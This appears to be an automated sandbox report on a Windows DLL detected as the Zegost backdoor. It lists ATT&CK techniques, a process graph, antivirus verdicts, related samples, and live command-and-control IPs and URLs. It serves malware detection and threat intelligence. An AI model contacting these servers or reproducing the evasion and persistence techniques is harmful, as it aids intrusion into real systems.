Remote System Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
Process Injection		Proc Filesystem1
System Network Configuration Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Rundll32		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578337 Sample: 4hSuRTwnWJ.dll Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 51 edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 2->51 53 default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 2->53 55 2 other IPs or domains 2->55 75 Suricata IDS alerts for network traffic 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 Antivirus / Scanner detection for submitted sample 2->79 81 6 other signatures 2->81 9 loaddll32.exe 1 2->9         started        11 rundll32.exe 2->11         started        13 rundll32.exe 2->13         started        signatures3 process4 process5 15 rundll32.exe 1 14 9->15         started        19 cmd.exe 1 9->19         started        21 rundll32.exe 9->21         started        27 5 other processes 9->27 23 cmd.exe 11->23         started        25 cmd.exe 13->25         started        dnsIp6 59 107.163.56.110, 18530, 49707 TAKE2US United States 15->59 61 107.163.56.235, 18530, 49706 TAKE2US United States 15->61 63 3 other IPs or domains 15->63 65 System process connects to network (likely due to code injection or exploit) 15->65 67 Creates an autostart registry key pointing to binary in C:\Windows 15->67 69 Uses ping.exe to sleep 19->69 71 Uses ping.exe to check the status of other devices and networks 19->71 29 rundll32.exe 19->29         started        31 cmd.exe 1 21->31         started        34 conhost.exe 23->34         started        36 PING.EXE 23->36         started        38 conhost.exe 25->38         started        40 PING.EXE 25->40         started        73 Found evasive API chain (may stop execution after checking mutex) 27->73 42 WerFault.exe 20 16 27->42         started        44 WerFault.exe 2 16 27->44         started        signatures7 process8 signatures9 83 Uses ping.exe to sleep 31->83 46 PING.EXE 1 31->46         started        49 conhost.exe 31->49         started        process10 dnsIp11 57 127.0.0.1 unknown unknown 46->57

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
4hSuRTwnWJ.dll79%ReversingLabsWin32.Backdoor.Zegost
4hSuRTwnWJ.dll100%AviraTR/Crypt.PEPM.Gen
4hSuRTwnWJ.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    		high
    default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
    		217.20.58.100
    		truefalse
      		high
      blogx.sina.com.cn
      		116.133.8.92
      		truefalse
        		high
        blog.sina.com.cn
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://107.163.56.110:18530/u1129.htmltrue
            		unknown
            http://107.163.56.236:18963/main.phptrue
              		unknown
              https://blog.sina.com.cn/u/5762479093false
                		high
                http://107.163.56.235:18530//joy.asp?sid=rungnejcodjgn0uWFe5vteX8v2LUicbtudb8mteZmdeYndG@true
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://blog.sina.com.cn/u/5762479093.rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://107.163.56.235:18530/rundll32.exe, rundll32.exe, 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmp, 4hSuRTwnWJ.dllfalse
                      		unknown
                      http://blog.sina.com.cn/u/57624790937rundll32.exe, 0000000B.00000003.1991942961.000000000337E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://blog.sina.com.cn/u/5762479093ionrundll32.exe, 0000000B.00000003.2889879555.000000000694C000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://blog.sina.com.cn/u/5762479093plicationrundll32.exe, 0000000B.00000003.2293898396.00000000068F4000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://107.163.56.236:18963/main.phpOjprundll32.exe, 0000000B.00000002.3148297250.00000000068EB000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://blog.sina.com.cn/u/57624790931rundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://blog.sina.com.cn/u/5762479093-rundll32.exe, 0000000B.00000003.2910772611.000000000338B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1991942961.000000000337E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3139060797.000000000338A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://blog.sina.com.cn/u/5762479093/rundll32.exe, 0000000B.00000003.2316425309.00000000068A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://blog.sina.com.cn/u/%srundll32.exe, 0000000B.00000002.3143520519.0000000005103000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://blog.sina.com.cn/u/5762479093rundll32.exe, 0000000B.00000003.2163751722.000000000684B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://blog.sina.com.cn/u/%sIrundll32.exe, 0000000B.00000002.3143520519.0000000005103000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://blog.sina.crundll32.exe, 0000000B.00000003.2163776228.0000000006845000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://107.163.56.236:18963/main.phpnirundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://blog.sina.com.cn/u/5762479093#rundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://107.163.56.110:18530/u1129.htmlOrundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://107.163.56.236:18963/main.phpowrundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://blog.sina.com.cn/u/5762479093nirundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://blog.sina.com.cn/u/5762479093Ojprundll32.exe, 0000000B.00000003.3010452322.00000000068EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3030027230.00000000068EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://107.163.56.236:18963/main.phpC:rundll32.exe, 0000000B.00000002.3146336861.0000000005F3D000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3146507233.000000000615A000.00000004.00000010.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://107.163.56.236:18963/main.phpqrundll32.exe, 0000000B.00000003.1991942961.000000000337E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://107.163.56.236:18963/main.phporundll32.exe, 0000000B.00000003.1991942961.000000000337E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://107.163.56.236:18963/main.phpwjrundll32.exe, 0000000B.00000003.3030027230.00000000068EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://107.163.56.236:18963/main.phpGUurundll32.exe, 0000000B.00000002.3139060797.0000000003365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://beacon.sina.com.cn/a.gif?noScriptrundll32.exe, 0000000B.00000003.2163776228.0000000006845000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2163718642.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930644848.0000000004D5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2163751722.000000000684B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://blog.sina.com.cn/u/%s-rundll32.exe, 0000000B.00000002.3143520519.0000000005103000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://107.163.56.236:18963/main.phpzrundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://107.163.56.236:18963/main.phparundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://107.163.56.235:18530//joy.asp?sid=rungnejcodjgn0uWFe5vteX8v2LUicbtudb8mteZmdeYndGrundll32.exe, 0000000B.00000002.3139060797.00000000032DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://107.163.56.236:18963/main.php)jRrundll32.exe, 0000000B.00000002.3148297250.00000000068EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://blog.sina.com.cn/u/5762479093irundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://107.163.56.236:18963/main.phpniurundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://107.163.56.236:18963/main.phpirundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://107.163.56.236:18963/main.php?jrundll32.exe, 0000000B.00000003.3010452322.00000000068EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3030027230.00000000068EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3148297250.00000000068EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://blog.sina.com.cn/u/5762479093irundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://107.163.56.236:18963/main.php3jTrundll32.exe, 0000000B.00000003.3030027230.00000000068EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3148297250.00000000068EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://upx.sf.netAmcache.hve.10.drfalse
                                                                                            		high
                                                                                            http://107.163.56.236:18963/main.phpOrundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://107.163.56.236:18963/main.phpYrundll32.exe, 0000000B.00000003.2316425309.00000000068A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://blog.sina.com.cn/u/5762479093Staterundll32.exe, 0000000B.00000002.3148297250.00000000068D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://107.163.56.236:18963/main.phpUrundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://107.163.56.236:18963/main.phpArundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://107.163.56.236:18963/main.php=rundll32.exe, 0000000B.00000003.2316425309.00000000068A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://107.163.56.236:18963/main.phpJrundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://107.163.56.110:1530/u1129.htmlrundll32.exe, 0000000B.00000002.3145175231.000000000533D000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://blog.sina.com.cn/u/%serundll32.exe, 0000000B.00000002.3143520519.0000000005103000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://blog.sina.com.cn/u/5762479093Grundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://blog.sina.com.cn/rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://107.163.56.236:18963/main.phpmjrundll32.exe, 0000000B.00000003.3030027230.00000000068EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://portrait6.sinaimg.cn/5762479093/blog/180rundll32.exe, 0000000B.00000003.2163776228.0000000006845000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2163718642.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930644848.0000000004D5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930575176.000000000650D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2163751722.000000000684B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      107.163.56.236
                                                                                                                      		unknownUnited States
                                                                                                                      		20248TAKE2UStrue
                                                                                                                      107.163.56.235
                                                                                                                      		unknownUnited States
                                                                                                                      		20248TAKE2UStrue
                                                                                                                      116.133.8.92
                                                                                                                      		blogx.sina.com.cnChina
                                                                                                                      		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                                                                                      107.163.56.110
                                                                                                                      		unknownUnited States
                                                                                                                      		20248TAKE2UStrue
                                                                                                                      107.163.56.251
                                                                                                                      		unknownUnited States
                                                                                                                      		20248TAKE2UStrue

                                                                                                                      Private

                                                                                                                      IP
                                                                                                                      127.0.0.1

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1578337
                                                                                                                      Start date and time:2024-12-19 15:42:12 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 9m 59s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:36
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:4hSuRTwnWJ.dll
                                                                                                                      renamed because original name is a hash value
                                                                                                                      Original Sample Name:0e275564dda101e8ea8a47cd5469a7f8ea90c77c.dll
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.evad.winDLL@37/12@2/6
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 33.3%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 92%
                                                                                                                      • Number of executed functions: 31
                                                                                                                      • Number of non-executed functions: 57
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .dll
                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 199.232.214.172, 23.50.131.216, 23.50.131.221, 20.189.173.22, 217.20.58.100, 13.107.246.63, 20.190.147.12, 20.109.210.53
                                                                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net
                                                                                                                      • Execution Graph export aborted for target rundll32.exe, PID 7716 because it is empty
                                                                                                                      • Execution Graph export aborted for target rundll32.exe, PID 8000 because it is empty
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • VT rate limit hit for: 4hSuRTwnWJ.dll

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      09:43:21API Interceptor1564482x Sleep call for process: rundll32.exe modified
                                                                                                                      09:43:22API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                                                                                      11:15:24API Interceptor2x Sleep call for process: WerFault.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      116.133.8.92QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                      • blog.sina.com.cn/u/5762479093
                                                                                                                      107.163.56.110QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                      • 107.163.56.110:18530/u1129.html
                                                                                                                      107.163.56.251yKVQVNB2qI.dllGet hashmaliciousUnknownBrowse
                                                                                                                        oQy3XhO4cX.dllGet hashmaliciousUnknownBrowse
                                                                                                                          gmqIbj35WF.dllGet hashmaliciousUnknownBrowse
                                                                                                                            Bcr1Wl2Jn0.dllGet hashmaliciousUnknownBrowse
                                                                                                                              OL50O9ho5M.dllGet hashmaliciousUnknownBrowse
                                                                                                                                02hNixBIvP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  abc.dllGet hashmaliciousUnknownBrowse

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    blogx.sina.com.cnQCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 116.133.8.92
                                                                                                                                    peks66Iy06.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 202.108.0.52
                                                                                                                                    XXHYneydvF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 202.108.0.52
                                                                                                                                    nt11qTrX4f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 202.108.0.52
                                                                                                                                    otsIBG7J9b.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 202.108.0.52
                                                                                                                                    XgijTrY6No.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 202.108.0.52
                                                                                                                                    08e2VwqyI0.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 202.108.0.52
                                                                                                                                    PqZ6GU98Eh.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 202.108.0.52
                                                                                                                                    jYAKmjIPgI.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 202.108.0.52
                                                                                                                                    b3sV534MMf.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 202.108.0.52
                                                                                                                                    bg.microsoft.map.fastly.net26B1sczZ88.dllGet hashmaliciousVirutBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    UV0zBp62hW.dllGet hashmaliciousVirutBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    RECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comYinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                    • 217.20.58.99
                                                                                                                                    gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • 217.20.58.99
                                                                                                                                    H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • 84.201.212.68
                                                                                                                                    H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • 217.20.58.100
                                                                                                                                    KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • 217.20.58.100
                                                                                                                                    1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • 84.201.211.18
                                                                                                                                    v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 217.20.58.101
                                                                                                                                    FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 217.20.58.100
                                                                                                                                    t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                    • 217.20.58.98
                                                                                                                                    update0.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                    • 217.20.58.100

                                                                                                                                    ASNs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    TAKE2USQCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.56.110
                                                                                                                                    peks66Iy06.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.241.232
                                                                                                                                    XXHYneydvF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.241.204
                                                                                                                                    nt11qTrX4f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.241.232
                                                                                                                                    otsIBG7J9b.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.241.232
                                                                                                                                    XgijTrY6No.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.241.204
                                                                                                                                    08e2VwqyI0.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.56.110
                                                                                                                                    PqZ6GU98Eh.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.56.110
                                                                                                                                    jYAKmjIPgI.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.56.110
                                                                                                                                    b3sV534MMf.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.56.110
                                                                                                                                    CHINA169-BACKBONECHINAUNICOMChina169BackboneCNx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 218.25.216.71
                                                                                                                                    QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 116.133.8.92
                                                                                                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 116.162.244.198
                                                                                                                                    sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 110.230.131.214
                                                                                                                                    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 124.133.226.227
                                                                                                                                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 112.85.190.34
                                                                                                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 218.28.241.0
                                                                                                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 112.247.180.189
                                                                                                                                    sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 42.179.207.24
                                                                                                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 211.93.253.39
                                                                                                                                    TAKE2USQCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.56.110
                                                                                                                                    peks66Iy06.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.241.232
                                                                                                                                    XXHYneydvF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.241.204
                                                                                                                                    nt11qTrX4f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.241.232
                                                                                                                                    otsIBG7J9b.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.241.232
                                                                                                                                    XgijTrY6No.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.241.204
                                                                                                                                    08e2VwqyI0.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.56.110
                                                                                                                                    PqZ6GU98Eh.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.56.110
                                                                                                                                    jYAKmjIPgI.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.56.110
                                                                                                                                    b3sV534MMf.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.163.56.110

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    37f463bf4616ecd445d4a1937da06e19QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • 116.133.8.92
                                                                                                                                    PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 116.133.8.92
                                                                                                                                    PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 116.133.8.92
                                                                                                                                    INVOICE-0098.pdf ... .lnk.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 116.133.8.92
                                                                                                                                    YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                    • 116.133.8.92
                                                                                                                                    F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                    • 116.133.8.92
                                                                                                                                    0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                    • 116.133.8.92
                                                                                                                                    tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                    • 116.133.8.92
                                                                                                                                    t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                    • 116.133.8.92
                                                                                                                                    Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 116.133.8.92

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\1.txt

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):512
                                                                                                                                    Entropy (8bit):4.318938392629634
                                                                                                                                    Encrypted:false
